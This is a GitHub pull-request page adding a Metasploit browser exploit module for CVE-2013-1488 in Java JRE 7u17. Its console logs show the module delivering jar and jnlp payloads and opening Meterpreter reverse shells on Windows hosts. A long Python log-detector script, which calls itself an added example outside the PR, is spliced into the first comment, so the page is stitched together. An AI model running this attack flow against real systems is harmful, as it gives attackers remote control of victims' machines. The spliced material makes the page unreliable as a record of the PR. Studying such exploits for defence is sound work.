
Add module for CVE-2013-1488 #1924

Merged
merged 3 commits into from Jun 7, 2013

Conversation

jvazquez-r7
Contributor

Module for the awesome bug and exploitation road described by @tiraniddo; impressive work from him.

Here is my try at the msf module. Hope I am not forgetting anything in the PR. Tested on Win / IE8 and Win / Google Chrome. It also bypasses click2play on IE. Needs Java JRE 17u17. It's one of the bugs patched after Pwn2Own.

Test:

msf exploit(java_jre17_driver_manager) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/k0OEsxDx
[*]  Local IP: http://10.6.0.165:8080/k0OEsxDx
[*] Server started.
msf exploit(java_jre17_driver_manager) > [*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/vbcDqcRu.jar
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/vbcDqcRu.jar
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/org.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/com.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/edu.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/net.class
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] Sending stage (30355 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:52828) at 2013-06-07 13:33:32 -0500
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/PpOfCKYH.jnlp
[*] 10.6.0.165       java_jre17_driver_manager - handling request for /k0OEsxDx/rvoXPXke.jar
[*] Sending stage (30355 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:52860) at 2013-06-07 13:33:44 -0500
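The request sequence in the test output above (a random base path, then a .jnlp followed by a .jar for the Web Start path, or a .jar followed by .class files for the applet path) is the part of this delivery a defender can see in web-proxy logs. The Python detector below is an added example, not part of this PR or of the Metasploit module: the log format, the SAMPLE_LOG lines, the 30-second window and the looks_random heuristic are all constructed assumptions, with the paths modelled on the ones in the output above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy-log lines (assumed format: timestamp client GET url status content-type).
# The first six mirror the request order in the PR's test output; the last two are
# a benign Web Start launch from a named path, included so the heuristic has a negative case.
SAMPLE_LOG = """\
2013-06-07T13:33:20 10.6.0.165 GET http://10.6.0.165:8080/k0OEsxDx 200 text/html
2013-06-07T13:33:21 10.6.0.165 GET http://10.6.0.165:8080/k0OEsxDx/ 200 text/html
2013-06-07T13:33:22 10.6.0.165 GET http://10.6.0.165:8080/k0OEsxDx/vbcDqcRu.jar 200 application/octet-stream
2013-06-07T13:33:23 10.6.0.165 GET http://10.6.0.165:8080/k0OEsxDx/org.class 200 application/octet-stream
2013-06-07T13:33:40 10.6.0.165 GET http://10.6.0.165:8080/k0OEsxDx/PpOfCKYH.jnlp 200 application/x-java-jnlp-file
2013-06-07T13:33:41 10.6.0.165 GET http://10.6.0.165:8080/k0OEsxDx/rvoXPXke.jar 200 application/octet-stream
2013-06-07T14:10:00 10.6.0.200 GET http://updates.example.test/app/launch.jnlp 200 application/x-java-jnlp-file
2013-06-07T14:10:02 10.6.0.200 GET http://updates.example.test/app/lib/app.jar 200 application/java-archive
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) GET (?P<url>\S+) (?P<status>\d{3}) (?P<ctype>\S+)$"
)
JAVA_EXT = (".jnlp", ".jar", ".class")


def parse_line(line):
    """Parse one log line into a record; return None if it does not match the assumed format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    segs = [s for s in parts.path.split("/") if s]
    low = parts.path.lower()
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "client": m.group("client"),
        "host": parts.netloc,
        "base": segs[0] if segs else "",          # first path segment, e.g. k0OEsxDx
        "ext": next((e for e in JAVA_EXT if low.endswith(e)), ""),
    }


def looks_random(seg):
    """Heuristic (assumption): a generated-looking base segment is 8+ mixed-case
    alphanumerics containing a digit, like /k0OEsxDx or /qJm82ZPQYw above."""
    return (len(seg) >= 8 and seg.isalnum()
            and any(c.isdigit() for c in seg)
            and any(c.islower() for c in seg)
            and any(c.isupper() for c in seg))


def find_java_delivery(log_text, window=timedelta(seconds=30)):
    """Return one finding per (client, host, base path, pattern) where a .jnlp is
    followed by a .jar, or a .jar by .class files, within `window`.
    Severity is 'high' when the base path looks generated, 'low' otherwise."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["ext"]:
            groups[(rec["client"], rec["host"], rec["base"])].append(rec)

    findings = []
    for (client, host, base), recs in groups.items():
        recs.sort(key=lambda r: r["ts"])
        seen = set()
        for i, first in enumerate(recs):
            follow = {r["ext"] for r in recs[i + 1:] if r["ts"] - first["ts"] <= window}
            if first["ext"] == ".jnlp" and ".jar" in follow:
                pattern = "jnlp->jar"
            elif first["ext"] == ".jar" and ".class" in follow:
                pattern = "jar->class"
            else:
                continue
            if pattern in seen:          # report each pattern once per group
                continue
            seen.add(pattern)
            findings.append({
                "client": client, "host": host, "base": base, "pattern": pattern,
                "severity": "high" if looks_random(base) else "low",
                "first_seen": first["ts"].isoformat(),
            })
    return findings


if __name__ == "__main__":
    for f in find_java_delivery(SAMPLE_LOG):
        print(f)
```

The sequence match alone will also fire on legitimate Web Start launches, which is why the random-looking base path only raises severity rather than being required; in practice the "low" findings are the ones to suppress by allow-listing known JNLP hosts.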

@wchen-r7
Contributor

wchen-r7 commented Jun 7, 2013

Processing......

@wchen-r7
Contributor

wchen-r7 commented Jun 7, 2013

Tested on Win 8, merging shortly:

ph33r:~ wchen$ msfconsole -q
msf exploit(java_jre17_driver_manager) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/qJm82ZPQYw
[*]  Local IP: http://10.0.1.76:8080/qJm82ZPQYw
[*] Server started.
msf exploit(java_jre17_driver_manager) > [*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw
[*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw/
[*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw/wOVRAtWq.jnlp
[*] 10.0.1.85        java_jre17_driver_manager - handling request for /qJm82ZPQYw/bCENzNFF.jar
[*] Sending stage (30355 bytes) to 10.0.1.85
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.85:49482) at 2013-06-07 15:05:26 -0500

msf exploit(java_jre17_driver_manager) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : WIN-VFQHRRTCA39
OS          : Windows 8 6.2 (x86)
Meterpreter : java/java
meterpreter >

@wchen-r7 wchen-r7 merged commit 79bfdf3 into rapid7:master Jun 7, 2013
@jvazquez-r7 jvazquez-r7 deleted the java_jre17_driver_manager branch November 18, 2014 15:50